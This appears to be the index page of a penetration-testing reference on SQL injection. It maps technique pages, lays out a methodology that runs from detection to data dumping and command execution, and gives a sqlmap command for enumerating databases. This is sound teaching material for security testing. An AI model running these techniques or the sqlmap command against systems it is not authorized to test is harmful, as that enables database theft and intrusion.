SQL Injection
SQL injection occurs when user input is concatenated into a SQL query without proper parameterisation, allowing the attacker to alter the query’s structure. Impact ranges from authentication bypass to full database extraction, file read/write on the database host, and remote code execution.
This section is operational reference. Use the page that matches your situation:
| You are… | Go to |
|---|---|
| Looking for the first injection in an unknown app | Detection |
| Trying to log in without credentials | Authentication bypass |
| Seeing query output reflected in the response | UNION-based |
| Confirmed injection, need to dump the database | Enumeration |
| Output not visible, but page behaviour changes | Boolean-based blind |
| Output not visible, no behavioural difference | Time-based blind |
| No response feedback at all | Out-of-band |
| User input appears in a query, but only after later use | Second-order |
| Injecting against MongoDB / NoSQL | NoSQL injection |
| Need to read or write files via the DB | File operations |
| Payload is being filtered or blocked | Filter bypasses |
| Need syntax for a specific DBMS | DBMS cheatsheet |
Standard methodology
Section titled “Standard methodology”- Identify every parameter that may influence a query - URL parameters, form fields, headers (
User-Agent,Cookie,X-Forwarded-For), JSON body fields. - Detect by injecting a syntax-breaking character (
',",),--) and observing for errors, behavioural change, or timing change. - Fingerprint the DBMS using version-specific payloads (see DBMS cheatsheet).
- Determine the injection class - in-band (UNION/error), inferential (boolean/time blind), or out-of-band.
- Enumerate schema → tables → columns → data.
- Escalate where possible: file read/write, command execution, lateral movement.
Conventions used in this section
Section titled “Conventions used in this section”Placeholders follow the same scheme everywhere:
<TARGET>- target host or URL<PARAM>- vulnerable parameter name<TABLE>,<COL>,<DB>- table, column, database name<USER>- target username (e.g.administrator)<N>- column count<ATTACKER>- your listener / collaborator host
When a page shows a payload, assume it is what gets injected into <PARAM> - URL-encoding, prefix, and suffix depend on context.
When to reach for sqlmap
Section titled “When to reach for sqlmap”Manual exploitation is faster for simple cases and essential for understanding what’s happening. sqlmap is the right tool when:
- You need to enumerate a large schema quickly.
- You’re chasing blind SQLi with hundreds of characters to extract.
- The target needs unusual handling (cookies, custom headers, JSON, multipart).
Minimal invocation:
sqlmap -u "https://<TARGET>/path?<PARAM>=test" --batch --dbsFor complex requests, save the request from Burp to a file and use -r request.txt. See DBMS cheatsheet for --dbms, --technique, and other flags worth knowing.